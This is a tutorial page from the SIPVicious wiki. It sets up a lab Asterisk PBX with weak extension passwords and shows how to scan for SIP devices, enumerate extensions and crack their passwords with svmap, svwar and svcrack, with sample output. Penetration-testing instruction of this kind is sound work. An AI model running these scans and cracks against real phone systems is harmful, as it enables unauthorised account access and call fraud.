Getting Started

Running SIPVicious tools for the first time.

Introduction

This guide assumes that you're running either a Linux or a Windows box. It also assumes that you're sufficiently comfortable with the command line. We will get a virtual machine running Asterisk PBX as a target and launch SIPVicious tools against it.

Preparation

For our local environment, we will need a virtual machine with Asterisk running on it. There are other options like FreeSwitch, which you can use according to your needs and taste. In this example we will be using Asterisk as our target.

Setting up the Victim box

Once you have Asterisk up make sure to create a few extensions. In our lab we have extensions 100, 101 and 123. Choose a numeric password for extension 100, no password for 101 and an alphabetic password like secret.

Making use of SIPVicious tools

I'll assume that your network is on the 192.168.1 subnet from now on. Replace that with your own subnet.

First run svmap against your subnet to find your Asterisk box:

[you@box sipvicious]$ ./svmap 192.168.1.1/24

+--------------------+--------------+
| SIP Device         | User Agent   |
-------------------------------------
| 192.168.1.103:5060 | Asterisk PBX |
+--------------------+--------------+

You should get results similar to the above. If not, make sure that you're scanning the right network.

To identify the extensions that you created previously:

[you@box sipvicious]$ ./svwar 192.168.1.103

+-----------+----------------+
| Extension | Authentication |
------------------------------
| 123       | reqauth        |
| 100       | reqauth        |
| 101       | noauth         |
+-----------+----------------+

As you can see, extension 101 does not require authentication. Finally to crack the password for 100, we just run the following command:

[you@box sipvicious]$ ./svcrack 192.168.1.103 -u 100

+-----------+----------+
| Extension | Password |
------------------------
| 100       | 100      |
+-----------+----------+

To crack an alphanumeric password we need to make use of a dictionary file. Create a text file called "dictionary.txt" containing your password.

[you@box sipvicious]$ ./svcrack 192.168.1.103 -u 123 -d dictionary.txt

+-----------+----------+
| Extension | Password |
------------------------
| 123       | secret   |
+-----------+----------+

Following that, you can make use of the credentials by making use of a SIP softphone of your choice.

Last edited by @0xInfection - 2021/06/01

SIPVicious Wiki

Home - Welcome to the wiki!
Introduction:
- Basics - Setting up dependencies & sipvicious.
- Toolset - Know the tools within the toolset.
- Getting Started - Running the tools you just installed.
Manual usage:
- svmap Usage - Using svmap.
- svwar Usage - Using svwar.
- svcrack Usage - Using svcrack.
- svreport Usage - Using svreport.
- svcrash FAQs - Solving queries about svcrash.
- Other FAQs - Answers to your common questions.
Automation - Automated testing and integration with CI/CD pipelines.
Development:
- Changelog - Tracking changes through the development.
Others:
- Media Mentions - Media mentions about sipvicious.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly